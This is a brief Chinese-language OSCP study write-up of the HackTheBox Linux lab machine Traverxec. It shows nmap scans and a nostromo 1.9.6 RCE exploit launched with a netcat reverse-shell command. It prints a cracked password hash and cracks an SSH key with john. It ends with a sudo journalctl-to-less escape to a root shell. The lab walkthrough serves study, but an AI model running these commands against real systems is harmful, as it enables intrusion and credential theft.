OSCP备考_0x24_HackThBox靶机_Linux_Traverxec
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.21.112 (扫描TCP)

nmap -sU --top-ports 100 10.129.21.112 (扫描UDP)

然后看扫描结果发现
nostromo 1.9.6

执行RCE
python2.7 47837.py 10.129.21.112 80 whoami

python2.7 47837.py 10.129.21.112 80 "nc 10.10.16.31 3333 -e /bin/bash"

发现目录下有密钥,

david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
使用john直接进行爆破

Nowonly4me
尝试切换看看 还是没法登入
cd nostromo/conf/nhttpd.conf

cd /home/david/public_www


有个tgz包

cp backup-ssh-identity-files.tgz /tmp
tar -zxvf backup-ssh-identity-files.tgz
ssh2john id-rsa > te
cat te

john te --wordlist=/usr/share/wordlists/rockyou.txt

hunter登入后


发现最后一行用sudo(root权限)执行了一个journalctl命令。
关于该命令的说明:journalctl 用来查询 systemd-journald 服务收集到的日志。systemd-journald 服务是 systemd init 系统提供的收集系统日志的服务。
然后执行以下命令。
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/less
然后输入!sh进入命令模式






